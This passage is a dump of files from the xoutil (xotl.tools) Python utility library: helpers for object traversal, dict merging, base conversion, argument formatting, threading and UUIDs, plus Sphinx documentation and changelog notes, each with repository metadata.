level.\n\n This helps getting an attribute that is buried down several levels\n deep. For example::\n\n traverse(request, 'session.somevalue')\n\n If `default` is not provided (i.e is `~xotl.tools.symbols.Unset`:obj:) and\n any component in the path is not found an AttributeError exceptions is\n raised.\n\n You may provide `sep` to change the default separator.\n\n You may provide a custom `getter`. By default, does an\n `smart_getter`:func: over the objects. If provided `getter` should have\n the signature of `getattr`:func:.\n\n See `get_traverser`:func: if you need to apply the same path(s) to several\n objects. Actually this is equivalent to::\n\n get_traverser(path, default=default, sep=sep, getter=getter)(obj)\n\n \"\"\"\n _traverser = get_traverser(path, default=default, sep=sep, getter=getter)\n return _traverser(obj)\n\n\ndef get_traverser(*paths, **kw):\n \"\"\"Combines the power of `traverse`:func: with the expectations from both\n `operator.itemgetter`:func: and `operator.attrgetter`:func:.\n\n :param paths: Several paths to extract.\n\n Keyword arguments has the same meaning as in `traverse`:func:.\n\n :returns: A function the when invoked with an `object` traverse the object\n finding each `path`.\n\n .. versionadded:: 1.5.3\n\n \"\"\"\n from xotl.tools.params import check_count\n\n check_count(paths, 1, caller=\"get_traverser\")\n\n def _traverser(path, default=Unset, sep=\".\", getter=None):\n if not getter:\n getter = lambda o, a, default=None: smart_getter(o)(a, default)\n\n def inner(obj):\n found = object()\n current = obj\n attrs = path.split(sep)\n while current is not found and attrs:\n attr = attrs.pop(0)\n current = getter(current, attr, found)\n if current is found:\n if default is Unset:\n raise AttributeError(attr)\n else:\n return default\n else:\n return current\n\n return inner\n\n if len(paths) == 1:\n result = _traverser(paths[0], **kw)\n else:\n _traversers = tuple(_traverser(path, **kw) for path in paths)\n\n def _result(obj):\n return tuple(traverse(obj) for traverse in _traversers)\n\n result = _result\n return result\n\n\ndef dict_merge(*dicts, **others):\n \"\"\"Merges several dicts into a single one.\n\n Merging is similar to updating a dict, but if values are non-scalars they\n are also merged is this way:\n\n - Any two `sequences <collection.Sequence>`:class: or :class:`sets\n <collections.Set>` are joined together.\n\n - Any two mappings are recursively merged.\n\n - Other types are just replaced like in `update`:func:.\n\n If for a single key two values of incompatible types are found, raise a\n TypeError. If the values for a single key are compatible but different\n (i.e a list an a tuple) the resultant type will be the type of the first\n apparition of the key, unless for mappings which are always cast to dicts.\n\n No matter the types of `dicts` the result is always a dict.\n\n Without arguments, return the empty dict.\n\n \"\"\"\n from collections import Mapping, Sequence, Set, Container\n\n if others:\n dicts = dicts + (others,)\n dicts = list(dicts)\n result = {}\n collections = (Set, Sequence)\n while dicts:\n current = dicts.pop(0)\n for key, val in current.items():\n if isinstance(val, Mapping):\n val = {key: val[key] for key in val}\n value = result.setdefault(key, val)\n if value is not val:\n if all(isinstance(v, collections) for v in (value, val)):\n join = get_first_of((value,), \"__add__\", \"__or__\")\n if join:\n constructor = type(value)\n value = join(constructor(val))\n else:\n raise ValueError(\"Invalid value for key '%s'\" % key)\n elif all(isinstance(v, Mapping) for v in (value, val)):\n value = dict_merge(value, val)\n elif all(not isinstance(v, Container) for v in (value, val)):\n value = val\n else:\n raise TypeError(\"Found incompatible values for key '%s'\" % key)\n result[key] = value\n return result\n\n\n@contextmanager\ndef save_attributes(obj, *attrs, getter=smart_getter, setter=smart_setter):\n r\"\"\"A context manager that restores `obj` attributes at exit.\n\n We deal with `obj`\\ 's attributes with `smart_getter`:func: and\n `smart_setter`:func:. You can override passing keyword `getter` and\n `setter`. They must take the object and return a callable to get/set the\n its attributes.\n\n Basic example:\n\n >>> from xotl.tools.future.types import SimpleNamespace as new\n >>> obj = new(a=1, b=2)\n\n >>> with save_attributes(obj, 'a'):\n ... obj.a = 2\n ... obj.b = 3\n\n >>> obj.a\n 1\n\n >>> obj.b\n 3\n\n Depending on the behavior of `getter` and or the object itself, it may be\n an error to get an attribute or key that does not exists.\n\n >>> getter = lambda o: lambda a: getattr(o, a)\n >>> with save_attributes(obj, 'c', getter=getter): # doctest: +ELLIPSIS\n ... pass\n Traceback (...)\n ...\n AttributeError: ...\n\n Beware, however, that `smart_getter`:func: is non-strict by default and it\n returns None for a non-existing key or attribute. In this case, we\n attempt to set that attribute or key at exit:\n\n >>> with save_attributes(obj, 'x'):\n ... pass\n\n >>> obj.x is None\n True\n\n But, then, setting the value may fail:\n\n >>> obj = object()\n >>> with save_attribute(obj, 'x'): # doctest: +ELLIPSIS\n ... pass\n Traceback (...)\n ...\n AttributeError: ...\n\n .. versionadded:: 1.8.2\n\n \"\"\"\n from xotl.tools.params import check_count\n\n check_count(attrs, 1)\n get_ = getter(obj)\n set_ = setter(obj)\n props = {attr: get_(attr) for attr in attrs}\n try:\n yield obj\n finally:\n for attr, val in props.items():\n set_(attr, val)\n\n\n@contextmanager\ndef temp_attributes(obj, attrs, getter=smart_getter, setter=smart_setter):\n \"\"\"A context manager that temporarily sets attributes.\n\n `attrs` is a dictionary containing the attributes to set.\n\n Keyword arguments `getter` and `setter` have the same meaning as in\n `save_attributes`:func:. We also use the `setter` to set the values\n provided in `attrs`.\n\n .. versionadded:: 1.8.5\n\n \"\"\"\n set_ = setter(obj)\n with save_attributes(obj, *tuple(attrs.keys()), getter=getter, setter=setter):\n for attr, value in attrs.items():\n set_(attr, value)\n yield\n\n\ndef import_object(name, package=None, sep=\".\", default=None, **kwargs):\n \"\"\"Get symbol by qualified name.\n\n The name should be the full dot-separated path to the class::\n\n modulename.ClassName\n\n Example::\n\n celery.concurrency.processes.TaskPool\n ^- class name\n\n or using ':' to separate module and symbol::\n\n celery.concurrency.processes:TaskPool\n\n Examples::\n\n >>> import_object('celery.concurrency.processes.TaskPool')\n <class 'celery.concurrency.processes.TaskPool'>\n\n # Does not try to look up non-string names.\n >>> from celery.concurrency.processes import TaskPool\n >>> import_object(TaskPool) is TaskPool\n True\n\n \"\"\"\n import importlib\n\n imp = importlib.import_module\n if not isinstance(name, str):\n return name # already a class\n sep = \":\" if \":\" in name else sep\n module_name, _, cls_name = name.rpartition(sep)\n if not module_name:\n cls_name, module_name = None, package if package else cls_name\n try:\n module = imp(module_name, package=package, **kwargs)\n return getattr(module, cls_name) if cls_name else module\n except (ImportError, AttributeError):\n if default is None:\n raise\n return default\n\n\ndef delegator(attribute, attrs_map, metaclass=type):\n \"\"\"Create a base class that delegates attributes to another object.\n\n The returned base class contains a `delegated attribute descriptor\n <DelegatedAttribute>`:class: for each key in `attrs_map`.\n\n :param attribute: The attribute of the delegating object that holds the\n delegated attributes.\n\n :param attrs_map: A map of attributes to delegate. The keys are the\n attribute names the delegating object attributes, and\n the values the attribute names of the delegated object.\n\n Example:\n\n >>> class Bar:\n ... x = 'bar'\n\n >>> class Foo(delegator('egg', {'x1': 'x'})):\n ... def __init__(self):\n ... self.egg = Bar()\n\n >>> foo = Foo()\n >>> foo.x1\n 'bar'\n\n .. versionadded:: 1.9.3\n\n \"\"\"\n descriptors = {\n key: DelegatedAttribute(attribute, attr) for key, attr in attrs_map.items()\n }\n return metaclass(\"delegator\", (object,), descriptors)\n\n\nclass DelegatedAttribute:\n \"\"\"A delegator data descriptor.\n\n When accessed the descriptor finds the `delegated_attr` in the instance's\n value given by attribute `target_name`.\n\n If the instance has no attribute with name `target_name`, raise an\n AttributeError.\n\n If the target object does not have an attribute with name `delegate_attr`\n and `default` is `~xotl.tools.symbols.Unset`:data:, raise an\n AttributeError. If `default` is not Unset, return `default`.\n\n .. versionadded:: 1.9.3\n\n \"\"\"\n\n def __init__(self, target_name, delegated_attr, default=Unset):\n self.target_name = target_name\n self.attr = delegated_attr\n self.default = default\n\n def __get__(self, instance, owner):\n if instance is not None:\n target = getattr(instance, self.target_name)\n try:\n return getattr(target, self.attr)\n except AttributeError:\n if self.default is not Unset:\n return self.default\n else:\n raise\n else:\n return self\n\n def __repr__(self):\n return \"<DelegatedAttr '%s.%s'>\" % (self.target_name, self.attr)\n\n\ndel contextmanager, deprecated\n" }, { "alpha_fraction": 0.5336044430732727, "alphanum_fraction": 0.5774828791618347, "avg_line_length": 23.082473754882812, "blob_id": "8e5f9f6b2377f90b4f7122189fbf535fb865d4e0", "content_id": "7b004f782d0125da226d2fce55ce46bca11d5c74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4673, "license_type": "no_license", "max_line_length": 87, "num_lines": 194, "path": "/xotl/tools/bases.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Integer encoding and decoding in different bases.\n\n\"\"\"\n\n_DEFAULT_TABLE = \"0123456789\" \"abcdefghijklmnopqrstuvwxyz\" \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\n_MAX_BASE = len(_DEFAULT_TABLE)\n\n_DEFAULT_BASE = _MAX_BASE\n\n\ndef _check_base(base):\n \"\"\"Check a base to be used in string to integer conversions.\n\n Return a tuple (base, table) if valid or raise an exception.\n\n \"\"\"\n if isinstance(base, int):\n table = _DEFAULT_TABLE\n if not (1 < base <= _MAX_BASE):\n raise ValueError(\"`base` must be between 2 and %s\" % _MAX_BASE)\n elif isinstance(base, str):\n table = base\n base = len(table)\n else:\n msg = (\n \"`base` must be an integer (base) or a string (table) with \"\n 'length greater or equal to 2; %s \"%s\" given'\n )\n raise TypeError(msg % (type(base).__name__, base))\n return base, table\n\n\ndef int2str(number, base=_DEFAULT_BASE):\n \"\"\"Return the string representation of an integer using a base.\n\n :param base: The base.\n :type base: Either an integer or a string with a custom table.\n\n Examples::\n\n >>> int2str(65535, 16)\n 'ffff'\n\n >>> int2str(65535)\n 'h31'\n\n >>> int2str(65110208921, 'merchise')\n 'ehimseiemsce'\n\n >>> int2str(651102, 2)\n '10011110111101011110'\n\n \"\"\"\n base, table = _check_base(base)\n sign = \"\" if number >= 0 else \"-\"\n number = abs(number)\n res = table[0] if number == 0 else \"\"\n while number:\n number, idx = divmod(number, base)\n res = table[idx] + res\n return str(sign + res)\n\n\ndef str2int(src, base=_DEFAULT_BASE):\n \"\"\"Return the integer decoded from a string representation using a base.\n\n :param base: The base.\n :type base: Either an integer or a string with a custom table.\n\n Examples::\n\n >>> str2int('ffff', 16)\n 65535\n\n >>> str2int('1c', 16) == int('1c', 16)\n True\n\n >>> base = 'merchise'\n >>> number = 65110208921\n >>> str2int(int2str(number, base), base) == number\n False\n\n >>> base = 32\n >>> str2int(int2str(number, base), base) == number\n True\n\n \"\"\"\n base, table = _check_base(base)\n if src.startswith(\"-\"):\n sign = -1\n i = 1\n else:\n sign = 1\n i = 0\n res = 0\n while i < len(src):\n res *= base\n res += table.index(src[i])\n i += 1\n return sign * res\n\n\nclass BaseConvertor:\n \"\"\"Base class that implements conversion algorithms based on a simple\n lookup table and a bit mask.\n\n Derived classes *must* provide a `table` attribute with the table of\n digits to use.\n\n \"\"\"\n\n @classmethod\n def inttobase(cls, num):\n \"\"\"Converts an integer to a base representation using the class' table.\n\n \"\"\"\n return int2str(num, base=cls.table)\n\n @classmethod\n def basetoint(cls, istr):\n \"\"\"Converts a base representation to a integer using the class' table.\n\n \"\"\"\n table = cls.table\n if cls.case_insensitive:\n table = table.lower()\n return str2int(istr, base=table)\n\n\nclass B32(BaseConvertor):\n \"\"\"Handles base-32 conversions.\n\n In base 32, each 5-bits chunks are represented by a single \"digit\". Digits\n comprises all symbols in 0..9 and a..v.\n\n >>> B32.inttobase(32) == '10'\n True\n\n >>> B32.basetoint('10')\n 32\n\n \"\"\"\n\n table = \"0123456789abcdefghijklmnopqrstuv\"\n case_insensitive = True\n\n\nclass B64(BaseConvertor):\n \"\"\"Handles [a kind of] base 64 conversions.\n\n This **is not standard base64**, but a reference-friendly base 64 to help\n the use case of generating a short reference.\n\n In base 64, each 6-bits chunks are represented by a single \"digit\".\n Digits comprises all symbols in 0..9, a..z, A..Z and the three symbols:\n `()[`.\n\n >>> B64.inttobase(64) == '10'\n True\n\n >>> B64.basetoint('10')\n 64\n\n .. warning::\n\n In this base, letters **are** case sensitive::\n\n >>> B64.basetoint('a')\n 10\n\n >>> B64.basetoint('A')\n 36\n\n \"\"\"\n\n table = \"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXZ()[\"\n case_insensitive = False\n\n\nclass B64symbolic(B64):\n \"\"\"Same as B64 but uses no capital letters and lots of symbols.\"\"\"\n\n table = \"0123456789abcdefghijklmnopqrstuvwxyz\" \":;><,._=!@#$^*/?\\\\{}%`|\\\"()[~'\"\n case_insensitive = True\n" }, { "alpha_fraction": 0.58984375, "alphanum_fraction": 0.591796875, "avg_line_length": 21.2608699798584, "blob_id": "85da179f37cfcb9b3ec6ab887283557860ed7413", "content_id": "536c55753b540355cd5e597bc25b47246f760075", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 512, "license_type": "permissive", "max_line_length": 78, "num_lines": 23, "path": "/docs/source/xotl.tools/fp.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.fp`:mod: -- Functional Programming in Python\n========================================================\n\n.. automodule:: xotl.tools.fp\n :synopsis: In Functional Programming a problem is decomposed into a set of\n functions.\n :members:\n\n--------------\n\nIdeally, a function only takes inputs and produce outputs, and doesn't have\nany internal state that affects the output produced for a given input (like in\nHaskell).\n\n\nContents\n--------\n\n.. toctree::\n :maxdepth: 1\n :glob:\n\n fp/*\n" }, { "alpha_fraction": 0.6651305556297302, "alphanum_fraction": 0.683563768863678, "avg_line_length": 31.549999237060547, "blob_id": "19a9b4e5e9d33bb8ce852b172c02134639c2ba27", "content_id": "6175a3e8df6ff34fd24d6506fc920a60295f0f9d", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 651, "license_type": "permissive", "max_line_length": 73, "num_lines": 20, "path": "/docs/source/history/_changes-1.9.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- With the release of 2.0.0, xoutil ends it support for Python 2.\n\n Releases 1.9 are a *continuation* of the 1.8 series and don't break any\n API found in the last release of that series: 1.8.8.\n\n- Add `xoutil.objects.import_object`:func:.\n\n- Add `xoutil.context.Context.from_defaults`:meth: and\n `xoutil.context.Context.from_dicts`:meth:.\n\n- Deprecate imports from top-level `xoutil`:mod:. The following objects\n should be imported from `xoutil.symbols`:mod:\\ :\n\n .. hlist::\n :columns: 3\n\n - `~xoutil.symbols.Unset`:obj:\n - `~xoutil.symbols.Undefined`:obj:\n - `~xoutil.symbols.Invalid`:obj:\n - `~xoutil.symbols.Ignored`:obj:\n" }, { "alpha_fraction": 0.5798125267028809, "alphanum_fraction": 0.584282636642456, "avg_line_length": 34.02525329589844, "blob_id": "a995e357cffc34683c5a57bdee2bf3611893588c", "content_id": "786f604c5d5131d6b39e77371e5189fd66881513", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6938, "license_type": "no_license", "max_line_length": 78, "num_lines": 198, "path": "/xotl/tools/tools.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Simple tools minimizing dependencies on other modules.\n\nThe only used module is Python's standard `re`:mod: module.\n\n\"\"\"\n\n\n# TODO: review this\ndef nameof(obj):\n \"\"\"Give the name of an object.\n\n First try normally named object (those having a ``'__name__'`` attribute);\n then some special classes instances that wraps the name internally are\n checked; then it tests for some objects that are singletons [#sing]_;\n finally -as a default tentative- return the type name.\n\n For example::\n\n >>> nameof(object)\n 'object'\n\n >>> nameof(lambda x: x)\n '<lambda>'\n\n >>> singletons = (None, True, False, Ellipsis, NotImplemented)\n >>> [nameof(s) for s in singletons]\n ['None', 'True', 'False', 'Ellipsis', 'NotImplemented']\n\n >>> nameof(0)\n 'int'\n\n This is a beginning intended to deprecate a \"fauna\" of several existing\n functions with the same purpose around several modules.\n\n .. [#sing] In this case an object is considered a signgleton if both of\n its representation strings (``str(obj)`` and ``repr(obj)``)\n match and it is a valid identifier.\n\n \"\"\"\n try:\n return obj.__name__\n except AttributeError:\n if isinstance(obj, (staticmethod, classmethod)):\n return obj.__func__.__name__\n else: # try for singleton\n import re\n\n res = str(obj)\n identifier_regex = \"(?i)^[_a-z][_a-z0-9]*$\" # TODO: Py3?\n if res == repr(obj) and re.match(identifier_regex, res):\n return res\n else:\n return type(obj).__name__\n\n\n# TODO: Move all functions in this module to a new place\n\n\ndef args_repr(args, **options):\n \"\"\"Format positional arguments to use in exception handling.\n\n :params args: tuple as obtained in arguments when declared in a function\n as ``*args``.\n\n :param options: some extra options could be used as excess keyword\n arguments.\n\n - count: maximum amount of actual parameters to process; after\n reached that amount a tail item is appended with the remainder\n number. If None is given -the default- the value ``3`` is used.\n\n - cast: must be a function to convert the value into the\n representation; when no value is given -the default- it's assumed\n ``λ arg: type(arg).__name__``.\n\n - item_format: the format for each argument type, if no value is\n given the value \"{}\" is used. Each item is obtained as with the\n \"cast\" function.\n\n - tail_format: a format string for the tail with the remainder (not\n processed arguments) specification; must contain a positional\n (like \"{}\") format specifier if obtaining the remainder count is\n desired; when no value is given -the default- the value \"...\" is\n used; another valid example could be \"and {} more\".\n\n - joiner: could be a function or a string to join all parts\n including the tail; if no value is given -the default- the value\n \", \" is used (thed equivalent to ``', '.join``).\n\n For example::\n\n >>> args_repr((1, 2.0, \"3\", {}))\n 'int, float, str, ...'\n\n \"\"\"\n count = options.get(\"count\", 3)\n cast = options.get(\"cast\", lambda arg: type(arg).__name__)\n item_format = options.get(\"item_format\", \"{}\")\n tail_format = options.get(\"tail_format\", \"...\")\n joiner = options.get(\"joiner\", \", \")\n if isinstance(joiner, str):\n joiner = str(joiner).join\n parts = []\n i = 0\n while i < min(count, len(args)):\n parts.append(item_format.format(cast(args[i])))\n i += 1\n rem = len(args) - i\n if rem > 0:\n parts.append(tail_format.format(rem))\n return joiner(parts)\n\n\ndef kwargs_repr(kwargs, **options):\n \"\"\"Format positional arguments to use in exception handling.\n\n :params kwargs: dict as obtained in arguments when declared as\n ``**kwargs``.\n\n :param options: some extra options are used in this function.\n\n - count: maximum amount of actual parameters to process; after\n reached that amount a tail item is appended with the remainder\n number. If None is given -the default- the value ``3`` is used.\n\n - cast: must be a function to convert the value into the\n representation; when no value is given -the default- it's assumed\n ``λ arg: type(arg).__name__``.\n\n - item_format: the format for each argument type, if no value is\n given the value \"{}:{}\" is used. Each item value is\n obtained as with the \"cast\" function.\n\n - tail_format: a format string for the tail with the remainder (not\n processed arguments) specification; must contain a positional\n (like \"{}\") format specifier if obtaining the remainder count is\n desired; when no value is given -the default- the value \"...\" is\n used; another valid example could be \"and {} more\".\n\n - joiner: could be a function or a string to join all parts\n including the tail; if no value is given -the default- the value\n \", \" is used (thed equivalent to ``', '.join``).\n\n For example::\n\n >>> kwargs_repr({'x': 1, 'y': 2.0, 'z': '3', 'zz': {}})\n 'x:int, y:float, z:str, ...'\n\n \"\"\"\n count = options.get(\"count\", 3)\n cast = options.get(\"cast\", lambda arg: type(arg).__name__)\n item_format = options.get(\"item_format\", \"{}:{}\")\n tail_format = options.get(\"tail_format\", \"...\")\n joiner = options.get(\"joiner\", \", \")\n if isinstance(joiner, str):\n joiner = str(joiner).join\n parts = []\n keys = list(kwargs)\n keys.sort()\n i = 0\n while i < min(count, len(keys)):\n key = keys[i]\n value = kwargs[key]\n parts.append(item_format.format(key, cast(value)))\n i += 1\n rem = len(keys) - i\n if rem > 0:\n parts.append(tail_format.format(rem))\n return joiner(parts)\n\n\ndef both_args_repr(args, kwargs, **options):\n \"\"\"Combine both argument kind representations.\n\n Both kinds are: positional (see `args_repr`:func:) and keyword (see\n `kwargs_repr`:func:).\n\n For example::\n\n >>> both_args_repr((1, 2.0, \"3\"), {'x': 1, 'y': 2.0, 'z': '3'})\n 'int, float, str, x:int, y:float, z:str'\n\n \"\"\"\n joiner = options.get(\"joiner\", \", \")\n if isinstance(joiner, str):\n joiner = str(joiner).join\n items = (args, args_repr), (kwargs, kwargs_repr)\n parts = [res for res in (fn(aux, **options) for aux, fn in items) if res]\n return joiner(parts)\n" }, { "alpha_fraction": 0.588850200176239, "alphanum_fraction": 0.5901902914047241, "avg_line_length": 27.922481536865234, "blob_id": "947e64fb03aab1191b35cf33aace28d22184757f", "content_id": "87fe1c7b82b72992259120eede20db471102d426", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3732, "license_type": "no_license", "max_line_length": 79, "num_lines": 129, "path": "/xotl/tools/future/threading.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to Python's `threading` module.\n\nYou may use it as drop-in replacement of ``threading``. Although we don't\ndocument all items here. Refer to `threading`:mod: documentation.\n\n\"\"\"\n\nfrom threading import * # noqa\nimport threading as _stdlib # noqa\n\nfrom threading import Event, Thread, RLock, Timer\n\n\ndef async_call(func, args=None, kwargs=None, callback=None, onerror=None):\n \"\"\"Executes a function asynchronously.\n\n The function receives the given positional and keyword arguments\n\n If `callback` is provided, it is called with a single positional argument:\n the result of calling `func(*args, **kwargs)`.\n\n If the called function ends with an exception and `onerror` is provided, it\n is called with the exception object.\n\n :returns: An event object that gets signalled when the function ends its\n execution whether normally or with an error.\n\n :rtype: `Event`:class:\n\n \"\"\"\n event = Event()\n event.clear()\n if not args:\n args = ()\n if not kwargs:\n kwargs = {}\n\n def async_():\n try:\n result = func(*args, **kwargs)\n if callback:\n callback(result)\n except Exception as error:\n if onerror:\n onerror(error)\n finally:\n event.set()\n\n thread = Thread(target=async_)\n thread.setDaemon(True) # XXX: Why?\n thread.start()\n return event\n\n\nclass _SyncronizedCaller:\n \"\"\"Protected to be used in `sync_call`:func:\"\"\"\n\n def __init__(self, pooling=0.005):\n self.lock = RLock()\n self._not_bailed = True\n self.pooling = pooling\n\n def __call__(self, funcs, callback, timeout=None):\n def _syncronized_callback(result):\n with self.lock:\n if self._not_bailed:\n callback(result)\n\n events, threads = [], []\n for which in funcs:\n event, thread = async_call(which, callback=_syncronized_callback)\n events.append(event)\n threads.append(thread)\n if timeout:\n\n def set_all_events():\n with self.lock:\n self._not_bailed = False\n for e in events:\n e.set()\n\n timer = Timer(timeout, set_all_events)\n timer.start()\n while events:\n terminated = []\n for event in events:\n flag = event.wait(self.pooling)\n if flag:\n terminated.append(event)\n for e in terminated:\n events.remove(e)\n if timeout:\n timer.cancel()\n\n\ndef sync_call(funcs, callback, timeout=None):\n \"\"\"Calls several functions, each one in it's own thread.\n\n Waits for all to end.\n\n Each time a function ends the `callback` is called (wrapped in a lock to\n avoid race conditions) with the result of the as a single positional\n argument.\n\n If `timeout` is not None it sould be a float number indicading the seconds\n to wait before aborting. Functions that terminated before the timeout will\n have called `callback`, but those that are still working will be ignored.\n\n .. todo:: Abort the execution of a thread.\n\n :param funcs: A sequences of callables that receive no arguments.\n\n \"\"\"\n sync_caller = _SyncronizedCaller()\n sync_caller(funcs, callback, timeout)\n\n\nfrom threading import __all__ # noqa\n\n__all__ = list(__all__) + [\"async_call\", \"sync_call\"]\n" }, { "alpha_fraction": 0.7291750311851501, "alphanum_fraction": 0.7315895557403564, "avg_line_length": 45.01852035522461, "blob_id": "44788b0154e74b9192232c2bc0e37adfb353c230", "content_id": "bf12dc713f87a9f28850d40de9a9e307e36c9501", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2485, "license_type": "permissive", "max_line_length": 101, "num_lines": 54, "path": "/docs/source/xotl.tools/future/functools.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.functools`:mod: - Higher-order functions and callable objects\n================================================================================\n\n.. module:: xotl.tools.future.functools\n\nThis module extends the standard library's `functools`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added the following features.\n\n.. autofunction:: power(*funcs, times)\n\n.. autoclass:: lwraps(f, n, *, name=None, doc=None, wrapped=None)\n\n.. autofunction:: curry\n\nWe have backported several Python 3.3 features but maybe not all.\n\n.. function:: update_wrapper(wrapper, wrapped, assigned=WRAPPER_ASSIGNMENTS, updated=WRAPPER_UPDATES)\n\n Update a wrapper function to look like the wrapped function. The optional\n arguments are tuples to specify which attributes of the original function\n are assigned directly to the matching attributes on the wrapper function\n and which attributes of the wrapper function are updated with the\n corresponding attributes from the original function. The default values\n for these arguments are the module level constants `WRAPPER_ASSIGNMENTS`\n (which assigns to the wrapper function's `__name__`, `__module__`,\n `__annotations__` and `__doc__`, the documentation string) and\n `WRAPPER_UPDATES` (which updates the wrapper function's `__dict__`, i.e.\n the instance dictionary).\n\n To allow access to the original function for introspection and other\n purposes (e.g. bypassing a caching decorator such as `lru_cache`:func:),\n this function automatically adds a `__wrapped__` attribute to the wrapper\n that refers to the original function.\n\n The main intended use for this function is in decorator functions which\n wrap the decorated function and return the wrapper. If the wrapper\n function is not updated, the metadata of the returned function will reflect\n the wrapper definition rather than the original function definition, which\n is typically less than helpful.\n\n `update_wrapper`:func: may be used with callables other than functions.\n Any attributes named in assigned or updated that are missing from the\n object being wrapped are ignored (i.e. this function will not attempt to\n set them on the wrapper function). AttributeError is still raised if the\n wrapper function itself is missing any attributes named in updated.\n..\n Local Variables:\n ispell-dictionary: \"en\"\n End:\n" }, { "alpha_fraction": 0.6062406897544861, "alphanum_fraction": 0.6270430684089661, "avg_line_length": 24.884614944458008, "blob_id": "3c965b05dc934dfcacc35e2c08291fddef5b9a4c", "content_id": "82c147c4eedc1e172475d236f7902f6c8d121960", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1347, "license_type": "no_license", "max_line_length": 78, "num_lines": 52, "path": "/xotl/tools/values/ids.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nr\"\"\"Utilities to obtain identifiers that are unique at different contexts.\n\nContexts could be global, host local or application local. All standard\n`uuid`:mod: tools are included in this one: `UUID`:class:, `uuid1`:func:,\n`uuid3`:func:, `uuid4`:func:, `uuid5`:func:, `getnode`:func: and standard\nUUIDs constants `NAMESPACE_DNS`, `NAMESPACE_URL`, `NAMESPACE_OID` and\n`NAMESPACE_X500`.\n\nThis module also contains:\n\n- `str_uuid`:func:\\ : Return a string with a GUID representation, random if\n the argument is True, or a host ID if not.\n\n.. versionadded:: 1.7.0\n\n.. deprecated:: 2.1.0\n\n\"\"\"\n\nfrom uuid import (\n UUID,\n uuid1,\n uuid3,\n uuid4,\n uuid5,\n getnode, # noqa\n NAMESPACE_DNS,\n NAMESPACE_URL,\n NAMESPACE_OID,\n NAMESPACE_X500,\n)\n\n\ndef str_uuid(random=False): # pragma: no cover\n \"\"\"Return a \"Global Unique ID\" as a string.\n\n :param random: If True, a random uuid is generated (does not use host id).\n\n .. deprecated:: 2.1.0 Use `uuid.uuid4`:func: or `uuid.uuid1`:func:.\n\n \"\"\"\n fn = uuid4 if random else uuid1\n return str(fn())\n" }, { "alpha_fraction": 0.7419354915618896, "alphanum_fraction": 0.7497013211250305, "avg_line_length": 40.849998474121094, "blob_id": "684eb409e4cc803b2e0ce393625e37387e50b322", "content_id": "68f80c384954ba45f11231578e3cb6f867eeca3d", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1674, "license_type": "permissive", "max_line_length": 79, "num_lines": 40, "path": "/docs/source/history/changes-1.2.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "This is the first of the 1.2.0 series. It's been given a bump in the minor\nversion number because we've removed some deprecated functions and/or modules.\n\n- Several enhancements to `xoutil.string`:mod: to make it work on Python 2.7\n and Python 3.2.\n\n Deprecates `xoutil.string.normalize_to_str`:func: in favor of the newly\n created `xoutil.string.force_str`:func: which is Python 3 friendly.\n\n- Backwards incompatible changes in `xoutil.objects`:mod: API. For instance,\n replaces `getattr` parameter with `getter` in `xoutil.objects.xdir`:func:\n and co.\n\n- Extracts decorator-making facilities from `xoutil.decorators`:mod: into\n `xoutil.mdeco`:mod:.\n\n .. The decorator-making decorator\n .. `xoutil.mdeco.decorator`:func: returns a signature-keeping decorator.\n\n- Fixes in `!xoutil.aop.extended`:mod:. Added parameters in\n `!xoutil.aop.classical.weave`:func:.\n\n- Introduces `xoutil.iterators.first_n`:func: and deprecates\n `xoutil.iterators.first`:func: and `xoutil.iterators.get_first`:func:.\n\n- Removes the `zope.interface` awareness from `xoutil.context`:mod: since it\n contained a very hard to catch bug. Furthermore, this was included to help\n the implementation of `xotl.ql`, and it's no longer used there.\n\n This breaks version control policy since it was not deprecated beforehand,\n but we feel it's needed to avoid spreading this bug.\n\n- Removed long-standing deprecated modules `xoutil.default_dict`:mod:,\n 